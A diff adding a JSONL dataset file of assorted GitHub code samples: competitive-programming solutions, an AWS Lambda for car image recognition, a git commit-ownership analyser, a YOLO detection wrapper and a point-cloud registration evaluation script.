diff --git "a/2539.jsonl" "b/2539.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2539.jsonl"
@@ -0,0 +1,648 @@
+{"seq_id":"24353414128","text":"def calculate(chess, opt):\n    move_list = [[], []]\n    for row in range(8):\n        # chess[row] == str\n        move_list[0].append(sum(1 for i in range(8) if chess[row][i] != opt[row%2][i]))\n        move_list[1].append(sum(1 for i in range(8) if chess[row][i] != opt[1-row%2][i]))\n    return min(map(sum, move_list))\n\ndef getNewChess(chess, i, j):\n    return [line[j:j+8] for line in chess[i:i+8]]\n\nN, M = map(int, input().split())\n\nopt = [ \"\".join('W' if i % 2 == 0 else 'B' for i in range(8)),\n        \"\".join('B' if i % 2 == 0 else 'W' for i in range(8))]\n\n# print(opt)\n\nchess = []\nfor linenum in range(N):\n    chess.append(input())\n\nanswer = 64\nfor i in range(N-8+1):\n    for j in range(M-8+1):\n        newchess = getNewChess(chess, i, j)\n        answer = min(answer, calculate(newchess, opt))\n\n#print(calculate(chess, opt))\nprint(answer)","repo_name":"moon0331/baekjoon_solution","sub_path":"level2/1018.py","file_name":"1018.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"13557333234","text":"import time\nfrom datetime import datetime\nimport json\nimport uuid\nimport boto3\nimport requests\nfrom botocore.exceptions import ClientError\n\ns3_client = boto3.client('s3')\ndynamodb = boto3.client('dynamodb')\n\ndef lambda_handler(event, context):\n    records = event['Records']\n    for record in records:\n        bucket = record['s3']['bucket']['name']\n        location = s3_client.get_bucket_location(Bucket=bucket)['LocationConstraint']\n        key = record['s3']['object']['key']\n\n        result = carnet_analyze_image(f'https://{bucket}.s3.{location}.amazonaws.com/{key}')\n\n        if result is not None:\n            save_to_db(result, 'carnetResponseDB')\n        else:\n            result = rekognition_analyze_image(bucket, key)\n            save_to_db(result, 'rekogintionAnalysesDB')\n\n    return {\"statusCode\": 200, \"body\": \"OK\"}\n\n\ndef carnet_analyze_image(image_url):\n    response = requests.post('https://carnet.ai/recognize-url', data=image_url)\n    status_code = response.status_code\n\n    if status_code == 200:\n        json_data = response.json()\n        print(json_data)\n        return json_data\n    elif status_code == 429:\n        print(\"Bad API response: 429. Retrying after half a second...\")\n        time.sleep(0.5)\n        return None\n    elif status_code == 500:\n        err = \"Image doesn't contain a car\"\n        if response.json()['error'] == err:\n            print(err)\n        else:\n            print(f\"Bad API response: {status_code}\")\n        return None\n    else:\n        print(f\"Bad API response: {status_code}\")\n        return None\n\n\ndef rekognition_analyze_image(bucket, key):\n    client = boto3.client('rekognition')\n    return client.detect_labels(\n        Image={\n            'S3Object': {\n                'Bucket': bucket,\n                'Name': key\n            }\n        },\n        MaxLabels=10,\n        MinConfidence=70\n    )\n\n\ndef save_to_db(data, db_name):\n    current_time = datetime.now().isoformat()\n\n    record = {\n        'id': {\n            'S': str(uuid.uuid4())\n        },\n        'created': {\n            'S': current_time\n        },\n        'updated': {\n            'S': current_time\n        },\n        'data': {\n            'S': json.dumps(data)\n        }\n    }\n\n    try:\n        dynamodb.put_item(TableName=db_name, Item=record)\n    except ClientError as e:\n        print(e.response['Error']['Message'])\n        raise e\n    return\n","repo_name":"nikajordania/carnet-ai-recognition-cli","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"73876294975","text":"from typing import List\n\n\nclass NumArray:\n\n    def __init__(self, nums: List[int]):\n        self.nums = nums\n        sum = 0\n        for i in range(len(nums)):\n            sum += nums[i]\n            nums[i] = sum\n\n    def sumRange(self, left: int, right: int) -> int:\n        if left == 0:\n            return self.nums[right]\n        else:\n            return self.nums[right] - self.nums[left-1]\n\n\n# Your NumArray object will be instantiated and called as such:\n# obj = NumArray(nums)\n# param_1 = obj.sumRange(left,right)\n","repo_name":"sakshamsds/data-structures-and-algorithms","sub_path":"leetcode/easy/RangeSumQuery303.py","file_name":"RangeSumQuery303.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"9999001067","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport re  # regular expression library\r\n\r\nfrom dateutil.parser import *\r\n\r\nfrom operator import itemgetter\r\n\r\nclass Commit:\r\n\r\n    def str_split (self, name):\r\n        name = name.split(\" - \")[0]\r\n        name = name.strip()\r\n\r\n        return name\r\n\r\n\r\n    def conta_ownership(self, rows, dict_total, dict_conta_arquivo):\r\n        \"\"\"\r\n        Function used to compute the ownership of the file\r\n        \"\"\"\r\n\r\n        for r in rows:\r\n            if r['qtd_variabilidades'] == \"\":\r\n                continue\r\n\r\n            if r['arquivo'] in dict_total:\r\n                total = dict_total.get(r['arquivo'])\r\n\r\n                total += 1\r\n                dict_total[r['arquivo']] = total\r\n            else:\r\n                dict_total[r['arquivo']] = 1\r\n\r\n            if (r['arquivo'], r['desenvolvedor']) in dict_conta_arquivo:\r\n                conta = dict_conta_arquivo.get((r['arquivo'], r['desenvolvedor']))\r\n\r\n                conta += 1\r\n                dict_conta_arquivo[(r['arquivo'], r['desenvolvedor'])] = conta\r\n            else:\r\n                dict_conta_arquivo[(r['arquivo'], r['desenvolvedor'])] = 1\r\n\r\n        for r in rows:\r\n            ownership = dict_conta_arquivo.get((r['arquivo'], r['desenvolvedor']))\r\n            total = dict_total.get(r['arquivo'])\r\n            r['ownership'] = 100 * float(ownership) / float(total)\r\n\r\n            classificacao_ownership = \"Minor\"\r\n\r\n            if r['ownership'] > 5:\r\n                classificacao_ownership = \"Major\"\r\n\r\n            r['classificacao_ownership'] = classificacao_ownership\r\n\r\n\r\n    def classificacao_tempo (self, rows, dict_total, dict_conta_arquivo):\r\n        \"\"\"\r\n        Sorts the rows by date and recomputes ownership for each date bucket\r\n        \"\"\"\r\n\r\n        begin = end = 0\r\n        
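# walk the rows in date order: each change of 'data' closes a bucket and ownership is recomputed for it\r\n        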
rows = sorted(rows, key = itemgetter('data'))\r\n\r\n data = rows[0]['data']\r\n for r in rows:\r\n if data != r['data']:\r\n self.conta_ownership(rows[begin:end], dict_total, dict_conta_arquivo)\r\n begin = end\r\n data = r['data']\r\n end += 1\r\n else:\r\n end += 1\r\n\r\n self.conta_ownership(rows[begin:end], dict_total, dict_conta_arquivo)\r\n return rows\r\n\r\n\r\n def conta_ownership_final(self, rows, dict_total, dict_conta_arquivo):\r\n \"\"\"\r\n \"\"\"\r\n\r\n for r in rows:\r\n ownership = dict_conta_arquivo.get((r['arquivo'], r['desenvolvedor']))\r\n total = dict_total.get(r['arquivo'])\r\n ownership = 100 * float(ownership) / float(total)\r\n\r\n classificacao_ownership = \"Minor\"\r\n\r\n if ownership > 5:\r\n classificacao_ownership = \"Major\"\r\n\r\n r['ownership_final'] = ownership\r\n r['classificacao_ownership_final'] = classificacao_ownership\r\n\r\n\r\n def parse_commit(self, rows_author, json_data):\r\n rows = []\r\n crows = []\r\n\r\n for r in rows_author:\r\n commits = r[\"commits\"].split(\", \")\r\n\r\n for commit in commits:\r\n\r\n if commit == \"\":\r\n continue\r\n\r\n idCommit, commitData = commit.split(\" - \")\r\n\r\n idCommit = idCommit.strip()\r\n #commitData = re.search('\\(([^)]+)', commitData).group(1)\r\n commitData = parse(commitData.strip(), ignoretz=True)\r\n\r\n found = \"False\"\r\n variabilities = []\r\n \r\n if idCommit in json_data['Commits']:\r\n if r['arquivo'] in json_data['Commits'][idCommit]['Arquivos']:\r\n jvar = json_data['Commits'][idCommit]['Arquivos'][r['arquivo']]['Variabilidades']\r\n\r\n for var in jvar:\r\n aux = self.str_split(var)\r\n\r\n if aux == \"TRUE\":\r\n found = \"True\"\r\n else:\r\n variabilities.append(aux)\r\n\r\n var = \"\"\r\n if len(variabilities) != 0:\r\n var = variabilities[0]\r\n\r\n crows.append({\r\n \"commit\": idCommit,\r\n \"data\": commitData.strftime(\"%Y-%m-01\"),\r\n \"desenvolvedor\": r[\"desenvolvedor\"], \r\n \"arquivo\": r[\"arquivo\"],\r\n \"qtd_variabilidades\": len(variabilities), \r\n \"existencia\": found, \r\n \"variabilidades\": var,\r\n \"classificacao\": \"\", \r\n \"ehautor\": r[\"autor\"],\r\n \"ownership\": 0,\r\n \"classificacao_ownership\": \"\",\r\n \"ownership_final\": 0,\r\n \"classificacao_ownership_final\": \"\"\r\n })\r\n\r\n if len(variabilities) > 0:\r\n for i in range(1, len(variabilities)):\r\n crows.append({\r\n \"commit\": idCommit,\r\n \"data\": commitData.strftime(\"%Y-%m-01\"),\r\n \"desenvolvedor\": r[\"desenvolvedor\"], \r\n \"arquivo\": r[\"arquivo\"],\r\n \"qtd_variabilidades\": \"\",\r\n \"existencia\": \"\", \r\n \"variabilidades\": variabilities[i],\r\n \"classificacao\": \"\", \r\n \"ehautor\": r[\"autor\"],\r\n \"ownership\": 0,\r\n \"classificacao_ownership\": \"\",\r\n \"ownership_final\": 0,\r\n \"classificacao_ownership_final\": \"\"\r\n })\r\n \r\n rows = sorted(crows, key = itemgetter('commit'))\r\n\r\n idx = 0\r\n gen = 0\r\n esp = 0\r\n idCommit = \"\"\r\n for i, r in enumerate(rows):\r\n\r\n if idCommit != r[\"commit\"]:\r\n \r\n if gen > 0:\r\n if esp > 0:\r\n classificacao = \"Misto\"\r\n else:\r\n classificacao = \"Generalista\"\r\n else:\r\n classificacao = \"Especialista\"\r\n\r\n for j in range(idx, i):\r\n rows[j][\"classificacao\"] = classificacao\r\n\r\n idx = i\r\n gen = 0\r\n esp = 0\r\n idCommit = r[\"commit\"]\r\n\r\n if len(r[\"variabilidades\"]) > 0:\r\n esp += 1\r\n\r\n if r[\"existencia\"] == \"True\":\r\n gen += 1\r\n\r\n if gen > 0:\r\n if esp > 0:\r\n classificacao = \"Misto\"\r\n else:\r\n classificacao = \"Generalista\"\r\n 
else:\r\n classificacao = \"Especialista\"\r\n\r\n for j in range(idx, len(rows)):\r\n rows[j][\"classificacao\"] = classificacao\r\n\r\n rows = sorted(crows, key = itemgetter('data'))\r\n dict_nome = dict()\r\n \r\n for i, r in enumerate(rows):\r\n if r['desenvolvedor'] in dict_nome:\r\n if dict_nome[r['desenvolvedor']] != r['classificacao']:\r\n dict_nome[r['desenvolvedor']] = \"Misto\"\r\n \r\n dev = r['desenvolvedor']\r\n data = r['data']\r\n for j in range(i, 0, -1):\r\n if rows[j]['desenvolvedor'] == dev:\r\n if rows[j]['data'] != data:\r\n break\r\n \r\n rows[j]['classificacao'] = \"Misto\"\r\n else:\r\n dict_nome[r['desenvolvedor']] = r['classificacao']\r\n\r\n dict_total = dict()\r\n dict_conta_arquivo = dict()\r\n self.classificacao_tempo(rows, dict_total, dict_conta_arquivo)\r\n self.conta_ownership_final(rows, dict_total, dict_conta_arquivo)\r\n\r\n return rows\r\n","repo_name":"karol-milano/SistemasConfiguraveis","sub_path":"doa/python/commit.py","file_name":"commit.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2991392451","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 6 17:24:16 2018\n\n@author: zouco\n\"\"\"\n\nfrom darkflow.net.build import TFNet\nimport cv2\nimport os\n# from pprint import pprint\nimport json\nimport matplotlib.pyplot as plt\nimport random\n\n\n\n\nclass YoloCV():\n \n def __init__(self, options = {\"model\": \"cfg/yolo.cfg\", \"load\": \"bin/yolov2.weights\", \"threshold\": 0.7, \"gpu\": 0.8}):\n \n if isinstance(options, str):\n with open(options,'r',encoding = 'utf-8') as f:\n options = json.load(f)\n \n wrk_dir = os.getcwd()\n os.chdir('C:\\\\Users\\\\zouco\\\\Desktop\\\\\\pyProject\\\\darkflow-master')\n self.tfnet_ = TFNet(options)\n os.chdir(wrk_dir)\n \n\n def run(self, pic_path, output_path):\n self.get_output(pic_path, output_path)\n plt.imshow(self.img_output_)\n # pprint(self.result_)\n print(self.result_summary_)\n \n \n def get_output(self, pic_path, output_path):\n self.get_result(pic_path)\n self.img_output_ = YoloCV.process_results(self.img_, self.result_)\n self.save_output(output_path)\n \n \n def get_result(self, pic_path):\n \n '''\n results is like a list of dictionary:\n {'bottomright': {x: .. 
, y: ..}, 'label': xx, 'confidence': xx , ...}\n \n '''\n \n \n self.img_ = cv2.cvtColor(cv2.imread(pic_path), cv2.COLOR_BGR2RGB)\n self.result_ = self.tfnet_.return_predict(self.img_)\n \n @staticmethod\n def process_results(img, results):\n # add rectangles with text \n \n items = set([item['label'] for item in results])\n \n color_dict = {}\n for item in items:\n color_dict.update({item: (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))})\n \n for result in results:\n label = result['label']\n color = color_dict[label]\n img = YoloCV.draw_rec(img, result, color)\n \n return img\n \n @staticmethod\n def draw_rec(img, result, color):\n # add one rectangle by result\n \n tl = (result['topleft']['x'], result['topleft']['y'])\n br = (result['bottomright']['x'], result['bottomright']['y'])\n label = result['label']\n \n lwd = 5\n img = cv2.rectangle(img, tl, br, color, lwd)\n img = cv2.putText(img, label, (tl[0], tl[1]-10), cv2.FONT_HERSHEY_COMPLEX, 1, color, lwd) \n return img\n \n\n \n def save_output(self, output_path):\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n plt.imsave(os.path.join(output_path, 'output.png'), self.img_output_)\n \n @property\n def result_summary_(self):\n items = [item['label'] for item in self.result_]\n summary_dict = {}\n for item in items:\n try:\n summary_dict[item] += 1\n except KeyError:\n summary_dict.update({item: 1})\n return summary_dict\n \n\nif __name__== \"__main__\":\n wrk_dir = os.getcwd()\n #config InlineBackend.figure_format = 'svg'\n #os.chdir('C:\\\\Users\\\\zouco\\\\Desktop\\\\\\pyProject\\\\darkflow-master')\n \n options = {\n \"model\": \"cfg/yolo.cfg\", \n \"load\": \"bin/yolov2.weights\", \n \"threshold\": 0.3,\n \"gpu\": 0.8}\n \n pic_path = \"C:\\\\Users\\\\zouco\\\\Desktop\\\\\\pyProject\\\\PicVideoForCV\\\\sample_office.jpg\"\n output_path = 'output'\n \n yc = YoloCV(options)\n yc.run(pic_path, output_path)\n \n \n \n \n","repo_name":"Apollo1840/ComputerVisionTools","sub_path":"Yolo/on_picture.py","file_name":"on_picture.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9915070543","text":"import sys\nsys.stdin = open('C:/Users/dhxog/Desktop/파이썬 알고리즘 문제풀이(코딩테스트 대비)/섹션 4/8. 
침몰하는 타이타닉/in2.txt', 'rt')\n\nn, m = map(int, input().split())\n\na = list(map(int, input().split()))\n\na\n\nfrom collections import deque\n\na.sort()\n\na = deque(a)\n\na\n\ncnt = 0\n\nwhile a:\n if len(a)==1:\n cnt+=1\n break\n if a[0]+a[-1]>m:\n a.pop()\n cnt+=1\n else:\n a.popleft()\n a.pop()\n cnt+=1\nprint(cnt)","repo_name":"dhxoghks95/Python_Algorithm","sub_path":"section_4/Q8/4_8oth.py","file_name":"4_8oth.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41091941819","text":"import torch\nimport os\nimport sys\nimport argparse\nimport importlib\nimport shutil\nimport numpy as np\nimport datetime\nimport logging\nfrom utils import distance_metric\nfrom pathlib import Path\nfrom utils.modelnet_data_loading import ModelNet40_h5_dataset_list\nfrom utils.sample_strategies import fps_sampling, random_sampling, index_points\nfrom tqdm import tqdm\nfrom utils.neighbor_search import query_knn_point\nimport math\nfrom utils.large_modelnet_data_loading import ModelNetDataLoader\nfrom utils.loss_functions import TaskLoss_regis\nfrom utils.regis_utils.qdataset import QuaternionFixedDataset\nfrom data.regis_modelnet_data_loading import ModelNetCls\nimport torchvision\nfrom utils.regis_utils.pctransforms import OnUnitCube, PointcloudToTensor\nfrom torch.utils.data import DataLoader\nfrom utils.visualization import visu_pc_w_dis, savetxt_pc_w_dis\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = BASE_DIR\nsys.path.append(os.path.join(ROOT_DIR, 'models'))\ncur_device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='OR-PD-train')\n parser.add_argument('--task_model', type=str, default='pcrnet')\n parser.add_argument('--sample_model', type=str, default='ASPD_dgcnn')\n parser.add_argument('--progressive_version', type=bool, default=True)\n parser.add_argument('--coarse_log_dir', type=str, default=None, help='other pretrained model')\n parser.add_argument('--log_dir', type=str, default='sampler_regis')\n parser.add_argument('--task_log_dir', type=str, default='pcrnet', help='full_acc=87.3%')\n parser.add_argument('--batch_size', type=int, default=2)\n parser.add_argument('--start_epoch', default=None)\n parser.add_argument('--n_point', type=int, default=1024)\n parser.add_argument('--n_sample', type=int, default=16)\n parser.add_argument('--visu', type=bool, default=True)\n\n parser.add_argument('--gpu', type=str, default='0', help='specify GPU devices')\n parser.add_argument('--data_dir', type=str, default='modelnet40_ply_hdf5_2048')\n\n parser.add_argument('--random_seed', type=int, default=0, help='int or None')\n\n parser.add_argument('--use_fps', type=bool, default=True)\n\n parser.add_argument('--pre_sample', type=str, default='rs')\n\n parser.add_argument('--alpha', type=float, default=10)\n parser.add_argument('--beta', type=float, default=1)\n parser.add_argument('--w_sigma', type=float, default=0.1, help='weights for sigma')\n\n parser.add_argument('--S_beta', type=float, default=0, help='beta in Simplify loss')\n parser.add_argument('--S_gamma', type=float, default=1)\n parser.add_argument('--S_delta', type=float, default=0)\n\n parser.add_argument('--lmbda', type=float, default=100, help='weight for task loss')\n\n parser.add_argument('--min_sigma', type=float, default=1e-4)\n parser.add_argument('--initial_temp', type=float, default=0.1)\n\n parser.add_argument('--partial_train', type=bool, 
default=False)\n\n parser.add_argument('--restore_last', type=bool, default=False)\n\n parser.add_argument('--uni_train', type=bool, default=False)\n\n parser.add_argument('--use_uniform_sample', type=bool, default=False)\n\n parser.add_argument('--use_large_dataset', type=bool, default=False)\n\n parser.add_argument('--process_data', type=bool, default=True)\n\n parser.add_argument('--check_repeat', type=bool, default=True)\n\n parser.add_argument('--use_atten', type=bool, default=True)\n\n parser.add_argument('--use_match', type=bool, default=True)\n\n parser.add_argument('--skip_projection', type=bool, default=True)\n\n parser.add_argument('--specific_mode', type=bool, default=False, help='extract knn feature for attention module from knn neighbors')\n\n parser.add_argument('--dense_eval', type=bool, default=False)\n\n\n ##### register related #####\n parser.add_argument('--exp_name', type=str, default='log/pcr_net/car_ipcrnet', metavar='N',\n help='Name of the experiment')\n parser.add_argument('--dataset_path', type=str, default='ModelNet40',\n metavar='PATH', help='path to the input dataset') # like '/path/to/ModelNet40'\n parser.add_argument('--eval', type=bool, default=False, help='Train or Evaluate the network.')\n\n # settings for input data\n parser.add_argument('--dataset_type', default='modelnet', choices=['modelnet', 'shapenet2'],\n metavar='DATASET', help='dataset type (default: modelnet)')\n parser.add_argument('--num_points', default=1024, type=int,\n metavar='N', help='points in point-cloud (default: 1024)')\n\n # settings for PointNet\n parser.add_argument('--emb_dims', default=1024, type=int,\n metavar='K', help='dim. of the feature vector (default: 1024)')\n parser.add_argument('--symfn', default='max', choices=['max', 'avg'],\n help='symmetric function (default: max)')\n\n # settings for on training\n parser.add_argument('-j', '--workers', default=4, type=int,\n metavar='N', help='number of data loading workers (default: 4)')\n parser.add_argument('--pretrained', default='log/pcr_net/car_ipcrnet/checkpoints/best_model.t7', type=str,\n metavar='PATH', help='path to pretrained model file (default: null (no-use))')\n parser.add_argument('--device', default='cuda:0', type=str,\n metavar='DEVICE', help='use CUDA if available')\n\n parser.add_argument('--seed', type=int, default=4321)\n\n parser.add_argument('--datafolder', type=str, default='car_hdf5_2048')\n\n return parser.parse_args()\nFLAGS = parse_args()\n\n\ndef creat_dir(args):\n timestr = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M'))\n exp_dir = Path('./log/')\n exp_dir.mkdir(exist_ok=True)\n\n task_log_dir = Path(args.exp_name)\n task_checkpoints_dir = task_log_dir.joinpath('checkpoints/')\n\n exp_dir = exp_dir.joinpath(args.sample_model)\n exp_dir.mkdir(exist_ok=True)\n\n if args.coarse_log_dir is not None:\n coarse_checkpoints_dir = exp_dir.joinpath(args.coarse_log_dir)\n coarse_checkpoints_dir = coarse_checkpoints_dir.joinpath('checkpoints/')\n else:\n coarse_checkpoints_dir = None\n\n if args.log_dir is None:\n exp_dir = exp_dir.joinpath(timestr)\n else:\n exp_dir = exp_dir.joinpath(args.log_dir)\n exp_dir.mkdir(exist_ok=True)\n checkpoints_dir = exp_dir.joinpath('checkpoints/')\n checkpoints_dir.mkdir(exist_ok=True)\n log_dir = exp_dir.joinpath('logs/')\n log_dir.mkdir(exist_ok=True)\n return log_dir, checkpoints_dir, task_checkpoints_dir, coarse_checkpoints_dir\n\n\ndef data_loading(args):\n '''data loading'''\n train_dataset_list = ModelNet40_h5_dataset_list(dataset_name=args.data_dir, 
split='train', n_point=args.n_point)\n test_dataset_list = ModelNet40_h5_dataset_list(dataset_name=args.data_dir, split='test', n_point=args.n_point)\n num_train_data = 0\n num_test_data = 0\n for loader_id in range(len(train_dataset_list)):\n num_train_data += len(train_dataset_list[loader_id])\n for loader_id in range(len(test_dataset_list)):\n num_test_data += len(test_dataset_list[loader_id])\n print('num of train_data: %d' % num_train_data)\n print('num of test_data: %d' % num_test_data)\n return train_dataset_list, test_dataset_list\n\n\ndef sample_idx_check(idx):\n cnt = 0\n for b in range(idx.shape[0]):\n elements, counts = torch.unique(idx[b], return_counts=True)\n cnt += sum(counts != 1)\n\n return cnt.cpu().data.numpy()\n\n\ndef log(args, log_dir):\n '''log'''\n logger = logging.getLogger(\"Model\")\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handler = logging.FileHandler('%s/%s.txt' % (log_dir, args.log_dir))\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n return logger\n\n\ndef load_checkpoints(model, checkpoints_dir, source_checkpoints_dir=None):\n try:\n if args.restore_last:\n checkpoint = torch.load(str(checkpoints_dir) + '/last_model.pth', map_location=torch.device(cur_device))\n else:\n checkpoint = torch.load(str(checkpoints_dir) + '/best_model.pth', map_location=torch.device(cur_device))\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['model_state_dict'])\n print('Use pre-trained models')\n except:\n if source_checkpoints_dir is not None:\n checkpoint = torch.load(str(source_checkpoints_dir) + '/best_model.pth',\n map_location=torch.device(cur_device))\n model_state_dict = checkpoint['model_state_dict']\n cur_state_dict = model.state_dict()\n cur_state_dict.update(model_state_dict)\n model.load_state_dict(cur_state_dict)\n # model.load_state_dict(checkpoint['model_state_dict'])\n print('No existing models, starting training from source checkpoints...')\n else:\n print('No existing models, starting training from scratch...')\n # model = model.apply(weights_init)\n start_epoch = 0\n return model, start_epoch\n\n\ndef main(args):\n def log_string(string):\n logger.info(string)\n print(string)\n\n '''log'''\n log_dir, checkpoints_dir, task_checkpoints_dir, source_checkpoints_dir = creat_dir(args)\n logger = log(args, log_dir)\n log_string('PARAMETER ...')\n log_string(args)\n\n shutil.copy('models/%s.py' % args.sample_model, str(log_dir))\n shutil.copy(str(os.path.abspath(__file__)), str(log_dir))\n\n '''data'''\n # '''data'''\n transforms = torchvision.transforms.Compose([PointcloudToTensor(), OnUnitCube()])\n\n traindata = ModelNetCls(\n args.num_points,\n transforms=transforms,\n train=True,\n download=False,\n folder=args.datafolder,\n )\n testdata = ModelNetCls(\n args.num_points,\n transforms=transforms,\n train=False,\n download=False,\n folder=args.datafolder,\n )\n\n train_repeats = max(int(5000 / len(traindata)), 1)\n\n trainset = QuaternionFixedDataset(traindata, repeat=train_repeats, seed=0, )\n testset = QuaternionFixedDataset(testdata, repeat=1, seed=0)\n\n '''create model'''\n MODEL = importlib.import_module(args.sample_model)\n if args.sample_model=='SNET' or args.sample_model=='SampleNet':\n sampler = MODEL.get_model(num_out_points=args.n_point).to(cur_device)\n else:\n sampler = MODEL.get_model(use_atten=args.use_atten, pre_sample=args.pre_sample).to(cur_device)\n\n TASK_MODEL = 
importlib.import_module(args.task_model)\n task_model = TASK_MODEL.iPCRNet().to(cur_device)\n task_model.requires_grad_(False)\n task_model.eval()\n task_checkpoints = torch.load(str(task_checkpoints_dir) + '/best_model.t7', map_location=torch.device(cur_device))\n task_model.load_state_dict(task_checkpoints)\n\n task_model.sampler = sampler\n\n task_model, start_epoch = load_checkpoints(task_model, checkpoints_dir, source_checkpoints_dir)\n\n sample_criterion = MODEL.get_sample_loss(alpha=args.alpha, beta=args.beta, S_beta=args.S_beta, S_gamma=args.S_gamma, S_delta=args.S_delta).to(cur_device)\n task_criterion = TaskLoss_regis().to(cur_device)\n\n if args.dense_eval:\n # n_sample_list = np.array([16,32,64,128,256,512])\n n_sample_list = 2 ** np.linspace(4, 10, 50)\n n_sample_list = n_sample_list.astype('int')\n else:\n n_sample_list = [args.n_sample]\n\n with torch.no_grad():\n task_model.sampler.eval()\n NRE_list = []\n RSR_list = []\n HD_list = []\n for n_sample in n_sample_list:\n mean_RE = []\n mean_HD = []\n repeat_sample_cnt = []\n test_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=False, drop_last=False,\n num_workers=args.workers)\n for batch_id, (data) in tqdm(enumerate(test_loader), total=len(test_loader)):\n template, source, igt = data\n template, source = template.to(cur_device).float(), source.to(cur_device).float()\n\n if args.use_fps:\n if args.pre_sample == 'fps':\n pred_subset_t = fps_sampling(template, n_sample)[0]\n pred_subset_s = fps_sampling(source, n_sample)[0]\n else:\n pred_subset_t = random_sampling(template, n_sample)[0]\n pred_subset_s = random_sampling(source, n_sample)[0]\n else:\n pred_subset_t, _ = task_model.sampler(template.transpose(2,1), n_sample)\n pred_subset_s, _ = task_model.sampler(source.transpose(2,1), n_sample)\n\n if args.sample_model == 'SNET' or args.sample_model == 'SampleNet':\n if args.progressive_version:\n pred_subset_t = pred_subset_t[:, :n_sample, :]\n pred_subset_s = pred_subset_s[:, :n_sample, :]\n\n\n if args.use_match:\n idx_t = query_knn_point(nsample=1, xyz=template, new_xyz=pred_subset_t)\n idx_s = query_knn_point(nsample=1, xyz=source, new_xyz=pred_subset_s)\n pred_subset_t = index_points(template, idx_t.squeeze())\n pred_subset_s = index_points(source, idx_s.squeeze())\n\n if args.check_repeat:\n cnt_t = sample_idx_check(idx_t)\n cnt_s = sample_idx_check(idx_s)\n cnt = 0.5 * (cnt_t + cnt_s)\n else:\n cnt = 0\n repeat_sample_cnt.append(cnt/template.shape[0])\n\n hd_t = distance_metric.hausdorff_dist(pred_subset_t, template)\n hd_s = distance_metric.hausdorff_dist(pred_subset_s, source)\n hd = 0.5 * (hd_t + hd_s)\n mean_HD.append(hd.item())\n\n samp_data = (pred_subset_t, pred_subset_s, igt)\n\n # if args.sample_model == 'SNET':\n # if args.progressive_version:\n # subset_t = pred_subset_t[:, :n_sample, :]\n # subset_s = pred_subset_s[:, :n_sample, :]\n # samp_data = (subset_t, subset_s, igt)\n\n _, pcrnet_loss_info = task_criterion(samp_data, task_model)\n rot_err = pcrnet_loss_info['rot_err']\n\n mean_RE.append(rot_err.cpu().data.numpy())\n\n if args.visu and batch_id in [2,21]:\n print(f'batch {batch_id}, rot err: {rot_err}')\n est_transform = pcrnet_loss_info['est_transform']\n transform_source = est_transform.rotate(template)\n transform_source_np = transform_source.cpu().data.numpy()\n template_np = template.cpu().data.numpy()\n source_np = source.cpu().data.numpy()\n pred_subset_t_np = pred_subset_t.cpu().data.numpy()\n pred_subset_s_np = pred_subset_s.cpu().data.numpy()\n for b in 
range(pred_subset_t.shape[0]):\n template_np_b = template_np[b]\n source_np_b = source_np[b]\n transform_source_np_b = transform_source_np[b]\n pred_subset_s_np_b = pred_subset_s_np[b]\n pred_subset_t_np_b = pred_subset_t_np[b]\n sampler_name = 'RS'\n dir_name = sampler_name + '_regis_' + str(args.n_sample)\n savetxt_pc_w_dis(template_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_template')\n savetxt_pc_w_dis(source_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_source')\n savetxt_pc_w_dis(transform_source_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_tran_source')\n savetxt_pc_w_dis(pred_subset_t_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_subset_t')\n savetxt_pc_w_dis(pred_subset_s_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_subset_s')\n\n\n\n\n test_mean_re = np.mean(mean_RE)\n test_mean_hd = np.mean(mean_HD)\n repeat_sample_rate = np.mean(repeat_sample_cnt) / n_sample\n log_string('test rot err (%d points) %.5f, repeat sample rate %.5f' % (n_sample, test_mean_re, repeat_sample_rate))\n NRE_list.append(test_mean_re)\n RSR_list.append(repeat_sample_rate)\n HD_list.append(test_mean_hd)\n\n result = np.concatenate([n_sample_list.reshape(-1,1), np.array(NRE_list).reshape(-1,1),\n np.array(HD_list).reshape(-1,1)], 1)\n # np.save('result/new/regis_RS.npy', result)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n exit()\n\n n_sample_list = [16, 64, 256]\n log_dir_list = ['base_16', 'base_64', 'base_256']\n\n\n for i in range(len(n_sample_list)):\n args.n_sample = n_sample_list[i]\n args.log_dir = log_dir_list[i]\n 